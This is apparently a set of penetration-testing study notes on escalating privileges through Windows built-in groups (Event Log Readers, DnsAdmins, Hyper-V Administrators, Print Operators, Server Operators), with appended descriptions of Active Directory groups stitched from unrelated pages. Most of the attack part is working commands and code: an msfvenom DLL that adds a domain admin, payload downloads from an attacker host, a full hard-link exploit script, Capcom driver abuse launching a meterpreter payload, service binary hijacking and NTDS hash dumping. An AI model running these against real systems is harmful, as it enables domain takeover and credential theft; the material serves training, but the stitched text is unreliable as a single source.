Alternative #4: Robocopy (locally)

Event Log Readers

Administrators or members of the Event Log Readers group have access to the Windows security event log, which saves the event ID 4688: A new process has been created. This is used for monitoring commands being run, such as tasklist, ver, ipconfig, systeminfo, typical commands used by attackers, or blocking access.

Very often members of the Event Log Readers group have permission to perform certain tasks without having to grant them administrative access.

Checking out our privileges:

# Confirming Group Membership
net localgroup "Event Log Readers"

# Also
whoami /groups

wevtutil

Searching Security Logs Using wevtutil (Windows Event Utility, used for querying and managing event logs):

wevtutil qe Security /rd:true /f:text | Select-String "/user"
# qe Security → Queries the Security event log.
# /rd:true → Reads events in reverse order (starting from the most recent).
# /f:text  → Formats the output in plain text (instead of XML or JSON).
# | Select-String "/user" → Pipes (`|`) the output to `Select-String`, which **searches for lines containing** `"/user"`.


# We can also specify alternate credentials for wevtutil using the parameters /u and /p.
wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

Get-WinEvent

We can also use the Get-WinEvent PowerShell cmdlet. In this example, we filter for process creation events (4688), which contain /user in the process command line.

Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

The cmdlet can also be run as another user with the -Credential parameter.

Abusing Powershell Operational

Other logs include PowerShell Operational log, which may also contain sensitive information or credentials if script block or module logging is enabled. This log is accessible to unprivileged users.

DnsAdmins

Members of the DnsAdmins group have access to DNS information on the network. The Windows DNS service supports custom plugins and can call functions from them to resolve name queries that are not in the scope of any locally hosted DNS zones.

The DNS service runs as NT AUTHORITY\SYSTEM, so membership in this group could potentially be leveraged to escalate privileges on a Domain Controller.

The attack in a nugshell (from the blog https://adsecurity.org/?p=4064 and «Feature, not bug: DNSAdmin to DC compromise in one line»):

By default, domain controllers are also DNS servers; DNS servers need to be reachable and usable by mostly every domain user.
The protocol’s implementation may allow, under some circumstances, to run code as SYSTEM on domain controllers, without being a domain admin. So, how is this possible?
- DNS management is performed over RPC.
- ServerLevelPluginDll allows us to load a custom DLL with zero verification of the DLL’s path. This can be done with the dnscmd tool from the command line
- When a member of the DnsAdmins group runs the dnscmd command below, the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\DNS\Parameters\ServerLevelPluginDll registry key is populated.
- When the DNS service is restarted, the DLL in this path will be loaded (i.e., a network share that the Domain Controller’s machine account can access)
- An attacker can load a custom DLL to obtain a reverse shell or even load a tool such as Mimikatz as a DLL to dump credentials.

Using msfvenon

1. Generating Malicious DLL to add a user to the domain admins group using msfvenom from your attacking machine:

msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll

2. Starting Local HTTP Server:

python3 -m http.server 7777

3. Downloading File to Target machine:

 wget "http://10.10.14.3:7777/adduser.dll" -outfile "adduser.dll"

4. Loading this DLL as a normal user isn’t successful. Only members of the DnsAdmins group are permitted to do this.

dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dll

5. With the registry setting containing the path of our malicious plugin configured, and our payload created, the DLL will be loaded the next time the DNS service is started. Membership in the DnsAdmins group doesn’t give the ability to restart the DNS service. If we do not have access to restart the DNS server, we will have to wait until the server or service restarts. Let’s check our current user’s permissions on the DNS service.

# Finding our user's SID
wmic useraccount where name="netadm" get sid

# Once we have the user's SID, we can use the sc command to check permissions on the service. If we see our SID in the output we can determine to which services our user has access:
sc.exe sdshow DNS

Example of an output:

D:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

6. Stopping and starting the DNS Service

sc.exe stop dns
sc.exe start dns

7. Confirming Group Membership

net group "Domain Admins" /dom

8. However, your session is still running at Medium Mandatory Level, which indicates you haven’t fully inherited the Domain Admin privileges yet.

And when you connect back, you will be Domain Admin.

9. Cleaning up:

# The first step is confirming that the ServerLevelPluginDll registry key exists. 
reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters

# Deleting Registry Key
reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters  /v ServerLevelPluginDll

# Starting the DNS Service Again
sc.exe start dns

# Checking DNS Service Status
sc.exe query dns

Using Mimilib.dll

As detailed in this post, we could also utilize mimilib.dll from the creator of the Mimikatz tool to gain command execution by modifying the kdns.c file to execute a reverse shell one-liner or another command of our choosing.

```c
/*  Benjamin DELPY `gentilkiwi`
    https://blog.gentilkiwi.com
    benjamin@gentilkiwi.com
    Licence : https://creativecommons.org/licenses/by/4.0/
*/
#include "kdns.h"

DWORD WINAPI kdns_DnsPluginInitialize(PLUGIN_ALLOCATOR_FUNCTION pDnsAllocateFunction, PLUGIN_FREE_FUNCTION pDnsFreeFunction)
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginCleanup()
{
    return ERROR_SUCCESS;
}

DWORD WINAPI kdns_DnsPluginQuery(PSTR pszQueryName, WORD wQueryType, PSTR pszRecordOwnerName, PDB_RECORD *ppDnsRecordListHead)
{
    FILE * kdns_logfile;
#pragma warning(push)
#pragma warning(disable:4996)
    if(kdns_logfile = _wfopen(L"kiwidns.log", L"a"))
#pragma warning(pop)
    {
        klog(kdns_logfile, L"%S (%hu)\n", pszQueryName, wQueryType);
        fclose(kdns_logfile);
        system("ENTER COMMAND HERE");
    }
    return ERROR_SUCCESS;
}

Creating a WPAD Record

Another way to abuse DnsAdmins group privileges is by creating a WPAD record. Membership in this group gives us the rights to disable global query block security, which by default blocks this attack. Server 2008 first introduced the ability to add to a global query block list on a DNS server. By default, Web Proxy Automatic Discovery Protocol (WPAD) and Intra-site Automatic Tunnel Addressing Protocol (ISATAP) are on the global query block list. These protocols are quite vulnerable to hijacking, and any domain user can create a computer object or DNS record containing those names.

After disabling the global query block list and creating a WPAD record, every machine running WPAD with default settings will have its traffic proxied through our attack machine. We could use a tool such as Responder or Inveigh to perform traffic spoofing, and attempt to capture password hashes and crack them offline or perform an SMBRelay attack.

1. To set up this attack, we first disabled the global query block list:

Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local

2. Next, we add a WPAD record pointing to our attack machine.

Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

Hyper-V Administrators

The Hyper-V Administrators group has full access to all Hyper-V features. If Domain Controllers have been virtualized, then the virtualization admins should be considered Domain Admins. They could easily create a clone of the live Domain Controller and mount the virtual disk offline to obtain the NTDS.dit file and extract NTLM password hashes for all users in the domain.

References:

From Hyper-V Admin to SYSTEM

It is also well documented on this blog, that upon deleting a virtual machine, vmms.exe attempts to restore the original file permissions on the corresponding .vhdx file and does so as NT AUTHORITY\SYSTEM, without impersonating the user. We can delete the .vhdx file and create a native hard link to point this file to a protected SYSTEM file, which we will have full permissions to.

If the operating system is vulnerable to CVE-2018-0952 or CVE-2019-0841, we can leverage this to gain SYSTEM privileges. Otherwise, we can try to take advantage of an application on the server that has installed a service running in the context of SYSTEM, which is startable by unprivileged users.

1. Target File: An example of this is Firefox, which installs the Mozilla Maintenance Service. We can update this exploit (a proof-of-concept for NT hard link) to grant our current user full permissions on the file below:

hyperv-eop.ps1:

## Hyper-V EOP via hardlink
## @decoder_it & @padovah4ck
function Native-HardLink {
<#
.SYNOPSIS
    This is a proof-of-concept for NT hard links. There are some advantages, from an offensive
    perspective, to using NtSetInformationFile to create hard links (as opposed to
    mklink/CreateHardLink). NtSetInformationFile allows us link to files we donâ€™t have write
    access to. In the script I am performing some steps which are not strictly speaking
    necessary, like using GetFullPathName for path resolution, I have done this mostly to
    educate myself.

    Be smart, you can create a hard linkâ€™s which you wonâ€™t be able to delete afterwards donâ€™t
    shoot yourself in the foot.

    Resources:
        - https://github.com/google/symboliclink-testing-tools
        - https://googleprojectzero.blogspot.com/2015/12/between-rock-and-hard-link.html

.DESCRIPTION
    Author: Ruben Boonen (@FuzzySec)
    License: BSD 3-Clause
    Required Dependencies: None
    Optional Dependencies: None

.PARAMETER Link
    The full path to hard link.

.PARAMETER Target
    The full path to the file we are linking to.

.EXAMPLE
    C:\PS> Native-HardLink -Link C:\Some\Path\Hard.Link -Target C:\Some\Path\Target.file
    True
#>

    [CmdletBinding()]
    param(
        [Parameter(Mandatory = $True)]
        [String]$Link,
        [Parameter(Mandatory = $True)]
        [String]$Target
    )

    # Native API Definitions
    Add-Type -TypeDefinition @"
    using System;
    using System.Diagnostics;
    using System.Runtime.InteropServices;
    using System.Security.Principal;

    [StructLayout(LayoutKind.Sequential)]
    public struct OBJECT_ATTRIBUTES
    {
        public Int32 Length;
        public IntPtr RootDirectory;
        public IntPtr ObjectName;
        public UInt32 Attributes;
        public IntPtr SecurityDescriptor;
        public IntPtr SecurityQualityOfService;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct IO_STATUS_BLOCK
    {
        public IntPtr Status;
        public IntPtr Information;
    }

    [StructLayout(LayoutKind.Sequential)]
    public struct UNICODE_STRING
    {
        public UInt16 Length;
        public UInt16 MaximumLength;
        public IntPtr Buffer;
    }

    [StructLayout(LayoutKind.Sequential,CharSet=CharSet.Unicode)]
    public struct FILE_LINK_INFORMATION
    {
        [MarshalAs(UnmanagedType.U1)]
        public bool ReplaceIfExists;
        public IntPtr RootDirectory;
        public UInt32 FileNameLength;
        [MarshalAs(UnmanagedType.ByValTStr,SizeConst=260)]
        public String FileName;
    }

    public static class NtHardLink
    {
        [DllImport("kernel32.dll", CharSet=CharSet.Ansi)]
        public static extern UInt32 GetFullPathName(
            String lpFileName,
            UInt32 nBufferLength,
            System.Text.StringBuilder lpBuffer,
            ref IntPtr FnPortionAddress);

        [DllImport("kernel32.dll")]
        public static extern bool CloseHandle(
            IntPtr hObject);

        [DllImport("ntdll.dll")]
        public static extern UInt32 NtOpenFile(
            ref IntPtr FileHandle,
            UInt32 DesiredAccess,
            ref OBJECT_ATTRIBUTES ObjAttr,
            ref IO_STATUS_BLOCK IoStatusBlock,
            UInt32 ShareAccess,
            UInt32 OpenOptions);

        [DllImport("ntdll.dll")]
        public static extern UInt32 NtSetInformationFile(
            IntPtr FileHandle,
            ref IO_STATUS_BLOCK IoStatusBlock,
            IntPtr FileInformation,
            UInt32 Length,
            UInt32 FileInformationClass);
    }
"@

    function Emit-UNICODE_STRING {
        param(
            [String]$Data
        )

        $UnicodeObject = New-Object UNICODE_STRING
        $UnicodeObject_Buffer = $Data
        [UInt16]$UnicodeObject.Length = $UnicodeObject_Buffer.Length*2
        [UInt16]$UnicodeObject.MaximumLength = $UnicodeObject.Length+1
        [IntPtr]$UnicodeObject.Buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($UnicodeObject_Buffer)
        [IntPtr]$InMemoryStruct = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(16) # enough for x32/x64
        [system.runtime.interopservices.marshal]::StructureToPtr($UnicodeObject, $InMemoryStruct, $true)

        $InMemoryStruct
    }

    function Get-FullPathName {
        param(
            [String]$Path
        )

        $lpBuffer = New-Object -TypeName System.Text.StringBuilder
        $FnPortionAddress = [IntPtr]::Zero

        # Call to get buffer length
        $CallResult = [NtHardLink]::GetFullPathName($Path,1,$lpBuffer,[ref]$FnPortionAddress)

        if ($CallResult -ne 0) {
            # Set buffer length and re-call
            $lpBuffer.EnsureCapacity($CallResult)|Out-Null
            $CallResult = [NtHardLink]::GetFullPathName($Path,$lpBuffer.Capacity,$lpBuffer,[ref]$FnPortionAddress)
            $FullPath = "\??\" + $lpBuffer.ToString()
        } else {
            $FullPath = $false
        }

        # Return FullPath
        $FullPath
    }

    function Get-NativeFileHandle {
        param(
            [String]$Path
        )

        $FullPath = Get-FullPathName -Path $Path
        if ($FullPath) {
            # IO.* does not support full path name on Win7
            if (![IO.File]::Exists($Path)) {
                Write-Verbose "[!] Invalid file path specified.."
                $false
                Return
            }
        } else {
            Write-Verbose "[!] Failed to retrieve fully qualified path.."
            $false
            Return
        }

        # Prepare NtOpenFile params
        [IntPtr]$hFile = [IntPtr]::Zero
        $ObjAttr = New-Object OBJECT_ATTRIBUTES
        $ObjAttr.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($ObjAttr)
        $ObjAttr.ObjectName = Emit-UNICODE_STRING -Data $FullPath
        $ObjAttr.Attributes = 0x40
        $IoStatusBlock = New-Object IO_STATUS_BLOCK

        # DesiredAccess = MAXIMUM_ALLOWED; ShareAccess = FILE_SHARE_READ
        $CallResult = [NtHardLink]::NtOpenFile([ref]$hFile,0x02000000,[ref]$ObjAttr,[ref]$IoStatusBlock,0x1,0x0)
        if ($CallResult -eq 0) {
            $Handle = $hFile
        } else {
            Write-Verbose "[!] Failed to acquire file handle, NTSTATUS($('{0:X}' -f $CallResult)).."
            $Handle = $false
        }

        # Return file handle
        $Handle
    }

    function Create-NtHardLink {
        param(
            [String]$Link,
            [String]$Target
        )

        $LinkFullPath = Get-FullPathName -Path $Link
        # IO.* does not support full path name on Win7
        $LinkParent = [IO.Directory]::GetParent($Link).FullName
        if (![IO.Directory]::Exists($LinkParent)) {
            Write-Verbose "[!] Invalid link folder path specified.."
            $false
            Return
        }


        # Create pFileLinkInformation & IOStatusBlock struct
        $FileLinkInformation = New-Object FILE_LINK_INFORMATION
        $FileLinkInformation.ReplaceIfExists = $true
        $FileLinkInformation.FileName = $LinkFullPath
        $FileLinkInformation.RootDirectory = [IntPtr]::Zero
        $FileLinkInformation.FileNameLength = $LinkFullPath.Length * 2
        $FileLinkInformationLen = [System.Runtime.InteropServices.Marshal]::SizeOf($FileLinkInformation)
        $pFileLinkInformation = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($FileLinkInformationLen)
        [System.Runtime.InteropServices.Marshal]::StructureToPtr($FileLinkInformation, $pFileLinkInformation, $true)
        $IoStatusBlock = New-Object IO_STATUS_BLOCK

        # Get handle to target
        $hTarget = Get-NativeFileHandle -Path $Target
        if (!$hTarget) {
            $false
            Return
        }

        # FileInformationClass => FileLinkInformation = 0xB
        $CallResult = [NtHardLink]::NtSetInformationFile($hTarget,[ref]$IoStatusBlock,$pFileLinkInformation,$FileLinkInformationLen,0xB)
        if ($CallResult -eq 0) {
            $true
        } else {
            Write-Verbose "[!] Failed to create hardlink, NTSTATUS($('{0:X}' -f $CallResult)).."
        }

        # Free file handle
        $CallResult = [NtHardLink]::CloseHandle($hTarget)
    }

    # Create Hard Link
    Create-NtHardLink -Link $Link -Target $Target
}

$user=$env:UserName
$mypath = "c:\users\$user\documents\"
$targetfile="c:\windows\system32\license.rtf"
echo "[+] Path:$mypath"
$VMName = "testEOP"
$NewVHDPath = $mypath+$VMName+".vhdx"
echo "[+] VHD Disk: $NewVHDPath"

echo "[+] removing disk"
remove-item -force -path $NewVHDPath -erroraction ignore
echo "[+] Creating VM ..."
$a=(Get-VMSwitch)
$VM = @{
     Name = $VMName
     MemoryStartupBytes = 2147483648
     Generation = 2
     NewVHDPath = $NewVHDPath
     NewVHDSizeBytes = 53687091200
     BootDevice = "VHD"
     Path = $mypath
     SwitchName = $a[0].Name
}

New-VM @VM
echo "[+] Done!"
echo "[+] removing disk"
remove-item -force $NewVHDPath
echo "[+] Creating link $NewVHDPath -> $targetfile"
Native-HardLink $NewVHDPath $targetfile 

echo "[+] removing VM"
Remove-VM -force -Name $VMName
echo "[+] New perms on target:"
get-acl $targetfile | fl

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

2. Taking Ownership of the File: After running the PowerShell script, we should have full control of this file and can take ownership of it.

takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

3. Starting the Mozilla Maintenance Service: Next, we can replace this file with a malicious maintenanceservice.exe, start the maintenance service, and get command execution as SYSTEM.

sc.exe start MozillaMaintenance

Note: This vector has been mitigated by the March 2020 Windows security updates, which changed behavior relating to hard links.

Print Operators: SeLoadDriverPrivilege

Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.

Note

Note: Since Windows 10 Version 1803, the «SeLoadDriverPrivilege» is not exploitable, as it is no longer possible to include references to registry keys under «HKEY_CURRENT_USER».

Alternative #1 Having access to GUI

Step 1. Check group memberships and privileges

Check our group membershipts:

We see Print Operators, which usually has the SeLoadDriverPrivilege. However when we check our permissions is not listed:

Output:

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

If we issue the command whoami /priv, and don’t see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC.
— You can bypass it with UACMe repo features or any similar code approach.
— You can also bypass it from user interface. Open a powershell with administrator permissions.

Step 2. If disabled, enabled SeLoadDriverPrivilege

1. Now, next troubleshooting is that the SeLoadDriverPrivilege may be Disabled. To enable it, we will need the following:

The executable EnableSeLoadDriverPrivilege.exe that we can compile using the forked repo https://github.com/amandaguglieri/enabling-privileges.
The file Capcom.sys. I’ve forked it to https://github.com/amandaguglieri/Capcom-Rootkit/blob/master/Driver/Capcom.sys
The DriverView.exe utility, officially available at https://www.nirsoft.net/utils/driverview.html and in my case, also uploaded to my repo.

2. Compiling EnableSeLoadDriverPrivilege.exe . I’ve set up Visual Studio 2022 in a Windows Virtual Machine.

# Clone my forked repo
https://github.com/amandaguglieri/enabling-privileges

# Add the following libraries to the EnableSeLoadDriverPrivilege.cpp file
#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#pragma comment(lib,"advapi32.lib") 
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"Ntdll.lib")
#include <stdio.h>
#include "tchar.h"

# Now, from the terminal (CTRL+ñ), compile:
cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cpp
# This will generate the required EnableSeLoadDriverPrivilege.exe. Save it to the folder from where you want to serve the payload to the target host.

3. Download the other required files (Capcom.sys and DriverView.exe) to the folder from where you want to serve the payload to the target host.

# Download Capcom.sys
wget https://github.com/amandaguglieri/enabling-privileges/blob/master/Capcom.sys

# Download DriverView.exe
wget https://github.com/amandaguglieri/hackinglife/blob/main/docs/files/DriverView.exe

4. Serve the files to the target host:

python3 -m http.server 80

5. Download the files to the target host:

# open a powershell terminal and change the directory for instance to C:\Tools
cd C:\Tools
wget http://$attackerIP/EnableSeLoadDriverPrivilege.exe -outfile EnableSeLoadDriverPrivilege.exe
wget http://$attackerIP/Capcom.sys -outfile Capcom.sys
wget http://$attackerIP/DriverView.exe -outfile DriverView.exe

6. Save the Capcom.sys driver from here, and save it to C:\test. If test does not exist, create it:

mkdir c:\test
copy Capcom.sys c:\test\Capcom.sys

7. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.

reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\test\Capcom.sys"

reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1

8. Using Nirsoft’s DriverView.exe, we can verify that the Capcom.sys driver is not loaded.

.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom

9. Run the EnableSeLoadDriverPrivilege.exe binary.

.\EnableSeLoadDriverPrivilege.exe

The Output should be something like this:

whoami:
INLANEFREIGHT0\printsvc

whoami /priv
SeMachineAccountPrivilege        Disabled
SeLoadDriverPrivilege            Enabled
SeShutdownPrivilege              Disabled
SeChangeNotifyPrivilege          Enabled by default
SeIncreaseWorkingSetPrivilege    Disabled
NTSTATUS: 00000000, WinError: 0

Step 3. Use ExploitCapcom Tool to Escalate Privileges

1. Next, verify that the Capcom driver is now listed.

.\DriverView.exe /stext drivers.txt
cat drivers.txt | Select-String -pattern Capcom

The output should be something like this:

Driver Name           : Capcom.sys
Filename              : C:\Tools\Capcom.sys

2. Now we will use the ExploitCapcom tool for escalating privileges. I’ve cloned it into a windows virtual machine with Visual Studio 2022 installed (in my kali machine)

Open Visual Studio 2022. Clone the project. Once cloned, right click and select «Compile». It’s important to change the architecture to x64 in order to compile.
Executable generated under «C:\Users\vboxuser\source\repos\ExploitCapcom\ExploitCapcom\x64\Release»

3. Upload the ExploitCapcom.exe file to the target machine:

# from the attacking machine
python3 -m http.server 80

# from the target host
wget http://$attackingIP/ExploitCapcom.exe -outfile ExploitCapcom.exe

4. Run the binary:

This launches a shell with SYSTEM privileges.

Alternative #2 With no access to GUI

If we do not have GUI access to the target, we will have to modify the ExploitCapcom.cpp code before compiling. Here we can edit line 292 and replace "C:\\Windows\\system32\\cmd.exe" with, say, a reverse shell binary created with msfvenom, for example: c:\ProgramData\revshell.exe.

1. In our attacking machine, open the Visual Studio from the windows virtualbox machine and modify these lines:

// Launches a command shell process
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

Use these ones instead:

// Launches a command shell process
static bool LaunchShell()
{
 TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");
    PROCESS_INFORMATION ProcessInfo;
    STARTUPINFO StartupInfo = { sizeof(StartupInfo) };
    if (!CreateProcess(CommandLine, CommandLine, nullptr, nullptr, FALSE,
        CREATE_NEW_CONSOLE, nullptr, nullptr, &StartupInfo,
        &ProcessInfo))
    {
        return false;
    }

    CloseHandle(ProcessInfo.hThread);
    CloseHandle(ProcessInfo.hProcess);
    return true;
}

Now compile the code and obtain the ExploitCapcom.exe file that will open a revshell.exe.

Generate the revshell.exe with msfvenom in your attacking machine:

msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=10.10.14.39 LPORT=1234 -f exe -o revshell.exe

Copy revshell.exe and ExploitCapcom.exe files to the host machine.

We would set up a listener based on the msfvenom payload we generated and hopefully receive a reverse shell connection back when executing ExploitCapcom.exe. If a reverse shell connection is blocked for some reason, we can try a bind shell or exec/add user payload.

Alternative #3 Automating the Steps

We can use a tool such as EoPLoadDriver to automate the process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver. To do this, we would run the following:

EoPLoadDriver.exe System\CurrentControlSet\Capcom c:\Tools\Capcom.sys

We would then run ExploitCapcom.exe to pop a SYSTEM shell or run our custom binary.

Clean-up

We can cover our tracks a bit by deleting the registry key added earlier.

reg delete HKCU\System\CurrentControlSet\Capcom

Server Operators

The Server Operators group allows members to administer Windows servers without needing assignment of Domain Admin privileges. It is a very highly privileged group that can log in locally to servers, including Domain Controllers.

Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.

Let’s examine the AppReadiness service.

App Readiness gets apps ready for use the first time a user signs in to this PC and when adding new apps.

We can confirm that this service starts as SYSTEM using the sc.exe utility.

Checking Service Permissions with PsService: We can use the service viewer/controller PsService, which is part of the Sysinternals suite, to check permissions on the service. PsService works much like the sc utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts.

c:\Tools\PsService.exe security AppReadiness

If we see in the output:

 [ALLOW] BUILTIN\Server Operators
 ```

This confirms that the Server Operators group has [SERVICE_ALL_ACCESS](https://docs.microsoft.com/en-us/windows/win32/services/service-security-and-access-rights) access right, which gives us full control over this service.

Checking Local Admin Group Membership to confirm that our target account is not present:

```powershell
net localgroup Administrators

Modifying the Service Binary Path: Let’s change the binary path to execute a command which adds our current user to the default local administrators group.

sc.exe config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

Starting the service fails, which is expected.

sc.exe start AppReadiness

Confirming Local Admin Group Membership:If we check the membership of the administrators group, we see that the command was executed successfully.

net localgroup Administrators

Confirming Local Admin Access on Domain Controller: From here, we have full control over the Domain Controller and could retrieve all credentials from the NTDS database and access other systems, and perform post-exploitation tasks.

crackmapexec smb 10.129.43.42 -u server_adm -p 'HTB_@cademy_stdnt!'

Output:

SMB         10.129.43.9     445    WINLPE-DC01      [*] Windows 10.0 Build 17763 (name:WINLPE-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         10.129.43.9     445    WINLPE-DC01      [+] INLANEFREIGHT.LOCAL\server_adm:HTB_@cademy_stdnt! (Pwn3d!)

Retrieving NTLM Password Hashes from the Domain Controller:

secretsdump.py server_adm@10.129.43.42 -just-dc-user administrator

Returning all ntdi:

` crackmapexec smb 10.129.172.26 -u Administrator -H 7796ee39fd3a9c3a1844556115ae1a54 -d INLANEFREIGHT.LOCAL --ntds

Last update: 2025-04-13

Created: March 15, 2025 13:29:13

Источник

Server Operators

The Server Operators group is a built-in security group in Windows Server environments. Members of this group are granted specific administrative privileges that allow them to perform server-related tasks without having full administrative rights. This group is primarily designed for delegated server management.

Key Privileges of Server Operators

Members of the Server Operators group have the following privileges:

Start and Stop Services:
- They can start, stop, and pause services on the server, which is crucial for server maintenance and troubleshooting.
Manage Shared Resources:
- Server Operators can create, modify, and delete shared folders and manage printer shares, allowing them to administer shared resources effectively.
Backup and Restore Operations:
- Members can back up files and restore files from backup, making it easier to manage data recovery processes.
Log on Locally:
- Members have the ability to log on locally to the server, which allows them to directly manage the server through its console.
Manage Local Users and Groups:
- They can add or remove users from local groups and manage local accounts, which is important for user management tasks.

While the Server Operators group has significant privileges, it does not have the same level of access as the Domain Admins group. Notably, Server Operators cannot:

Manage Active Directory: They do not have permissions to modify Active Directory objects or group memberships outside of local server settings.
Modify System Settings: Critical system configurations that affect the entire domain or security policies are beyond their reach.

Last updated 7 months ago

Источник

This video looks at the unique built-in groups available only to Domain Controllers and locally on Windows Server 2008. Please see the previous video Default Local Groups for the rest of the built-in groups.

Groups covered in this video
Server Operators 03:58

Account Operators 05:01

Print Operators 06:18

Terminal Server Licenses Servers 07:25

Incoming Forest Trust Builders 07:57

Certificate Services DCom Access 09:03

Windows Authorization Access Group 09:38

DC Promotion Process
If you attempt to edit the local users and groups on a Domain Controller (this can be done using lusrmgr.msc from the start menu) you will find the local accounts database on the computer will be disabled. The local groups on a Domain Controller have been moved to Active Directory and can be found in the OU Builtin. If you use one of these groups, the change will affect all Domain Controllers.

Server Operators
This group allows members to login to Domain Controllers, start and stop services on the Domain Controllers, perform backup and restore operations, format disks, create shares, and shut down and restart Domain Controllers. This group has no default members and does not give the user access to any other servers that are not domain controllers. This group is aimed at someone who is performing maintenance on Domain Controllers. For this reason, members cannot perform Active Directory administration.

Account Operators
Members of this group can perform Active Directory administration such as create new users and groups. Although it is not required for Active Directory administration, members of this group can login to a Domain Controller. Once logged in, they can only perform Active Directory Administration: they cannot perform other tasks on the Domain Controller like rebooting. It should be remembered that account operators are not administrators in the domain, and thus some Active Directory administration cannot be done due to security reasons. This includes making changes to the Domain Controllers OU, changing members of the Domain/Enterprise Administrations group, or changing properties for any user that is an administrator.

Print Operators
Members of this group can manage printers on Domain Controllers and printer objects in Active Directory. In order to manage printers on a Domain Controller, member of this group can also login to a Domain Controller. Allthough they don not have the rights to perform day to day administration on the Domain Controller, members of this group can shut down the Domain Controller.

Terminal Server Licenses Servers
Inside an Active Directory user account is information stored about terminal server licenses. The terminal services licensing server needs to access this information. In order to only give this server the minimum required access to Active Directory to get this information, you can add the computer account of the licensing server to this group.

Incoming Forest Trust Builders
To create a trust between two domains, normally an administrator in each domain will create and approve the trust. If you place a user from another domain in this group, they will be able to create an incoming trust from another domain to that domain without an administrator in the other domain having to create or approve the trust.

Certificate Services DCom Access
This group exists on both Domain Controllers and member servers. If users that use DCom need access to certificates, they need to be added to this group.

Windows Authorization Access Group
In the user account in Active Directory there is a computed token. This is a computed version of the same security token that is created when a user logs in. You only need to add users to this group for special software that requires this access.

Pre-Windows 2000 Compatible Access
Members of this group are allowed read access to users and group in the domain. This group should only be used if you have Windows NT computers in your domain.

References
“MCTS 70-640 Configuring Windows Server 2008 Active Directory” Microsoft Press, pg. 177-179
“Default groups” http://technet.microsoft.com/en-us/library/cc756898(v=ws.10).aspx
“Terminal Services Per User Client Access License Tracking and Reporting“ http://technet.microsoft.com/en-us/library/cc775281(v=ws.10).aspx
“An overview of groups used by Active Directory Certificate Services” http://morgansimonsen.wordpress.com/2012/01/24/an-overview-of-groups-used-by-active-directory-certificate-services/

Credits

Источник

После установки роли AD на Windows Server появляются несколько стандартных групп безопасности, которые в основном связаны с управлением Active Directory. Какие же группы создаются?

1) Администраторы предприятия (Enterprise Admins) – находится в контейнере Users корневого домена леса. Эта группа – член группы Администраторы (Administrators) в каждом домене леса; она представляет полный доступ к конфигурации всех контроллеров домена. Данная группа также является владельцем раздела Конфигурация (Configuration) каталога и имеет полный доступ к содержимому именования домена во всех доменах леса.

2) Администраторы схемы (Schema Admins) – находится в контейнере Users корневого домена леса. Эта группа имеет полный доступ к схеме Active Directory.

